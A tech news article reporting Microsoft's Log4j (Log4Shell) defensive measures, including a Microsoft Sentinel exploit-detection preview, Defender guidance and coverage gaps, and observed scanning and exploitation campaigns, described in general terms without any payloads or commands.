Microsoft Sentinel Gets Log4j Exploit Detector Preview

Microsoft added a preview solution in Microsoft Sentinel that helps IT pros find signs of Log4j exploits, according to a Thursday announcement and Twitter post.

The Log4j exploit detection preview solution is available through Microsoft Sentinel's Content Hub. Oddly, organizations with Microsoft Sentinel subscriptions from Microsoft Azure Cloud Solution Provider partners have to manually install this preview, if wanted, per comments in the announcement.

"Solutions can't be deployed into subscriptions from Microsoft Azure Cloud Solution Providers," commented Sarah Young of Microsoft. "However, you can manually add these detections into your workspace from our GitHub repo."

Microsoft has been keeping users of its security solutions apprised of updated tools for dealing with potential Log4j exploits in this Dec. 11 announcement, which has undergone a few revisions. It was recently updated to include the new details about the Microsoft Sentinel preview solution, for instance.

Log4j is an open source Java logging library that widely used in multiple applications (see CISA's list). It's currently under widespread attack because of a security hole dubbed "Log4Shell" (CVE-2021-44228) that can enable remote code execution.

One of the earliest discovered attack venues for the Log4j vulnerability was Microsoft's Minecraft game, as hosted on servers maintained by non-Microsoft users. Microsoft is encouraging those maintainers to install the latest update to the game.

Microsoft Defender for Endpoint for Detecting Attacks
Microsoft Defender for Endpoint users should check for "signs of post-exploitation, rather than fully relying on prevention" measures, the Dec. 11 announcement indicated:

Due to the broad network exploitation nature of vectors through which this vulnerability can be exploited and the fact that applying mitigations holistically across large environments will take time, we encourage defenders to look for signs of post-exploitation rather than fully relying on prevention. Observed post exploitation activity such as coin mining, lateral movement, and Cobalt Strike are detected with behavior-based detections.

Cloud Protections Using Microsoft Defender Antivirus
Microsoft advised Microsoft Defender Antivirus users to "turn on cloud-delivered protection," which will "cover rapidly evolving attacker tools and techniques."

Microsoft 365 Defender Blindspots
Microsoft 365 Defender may not find all vulnerable Log4j Java ARchive (JAR) files, plus Linux and macOS support is yet to come, the Dec. 11 announcement admitted:

As of this writing (12/16/2021), discoverability [in Microsoft 365 Defender] is based on the presence of vulnerable Log4j Java ARchive (JAR) files on Windows 10, Windows 11, and Windows Server 2008, 2012, and 2016. Cases where Log4j is packaged into an Uber-JAR or shaded are currently not discoverable, but coverage for these instances and other packaging methods is in-progress. Support for Linux and macOS is also in-progress and will roll out soon.

Microsoft is currently rolling out Microsoft Defender for Endpoint updates to "surface vulnerable Log4j library components," which will enable it to "automatically discover" the vulnerabilities.

Security Center Alerts
Microsoft's Security Center portal will show alerts on threat activity associated with Log4j exploits for both Linux and Windows systems.

Security Center will show alerts when traffic associated with the CVE-2021-44228 vulnerability is being used. It'll detect Cobalt Strike command and control installs, plus other shells, backdoors and coin miners. The Security Center portal also will show activations of suspicious commands and scripts.

Azure Firewall Premium Users Protected
Azure Firewall Premium subscribers "have enhanced protection from the Log4j RCE CVE-2021-44228 vulnerability and exploit," Microsoft's Dec. 11 announcement indicated.

This protection doesn't appear to be afforded to Azure Firewall Standard users. The announcement advised Standard users to upgrade to the Premium product.

Mass Scanning Activities
Microsoft has been detecting mass scanning for the Log4j vulnerability. The Mirai botnet is targeting Elasticsearch systems to deploy cryptocurrency miners. The vulnerability is also being used to install Tsunami backdoors on Linux systems, Microsoft indicated.

"Many of these campaigns are running concurrent scanning and exploitation activities for both Windows and Linux systems, using Base64 commands included in the JDNI:ldap:// request to launch bash commands on Linux and PowerShell on Windows," the Dec. 11 announcement indicated.

Microsoft is also observing nation-state activity from "groups originating from China, Iran, North Korea and Turkey" using the vulnerability.

The Microsoft Threat Intelligence Center (MSTIC) is keeping a list of indicators of compromise associated with the Log4j vulnerability. The raw list is located at this GitHub page.

About the Author

Kurt Mackie is senior news producer for 1105 Media's Converge360 group.


comments powered by Disqus

Subscribe on YouTube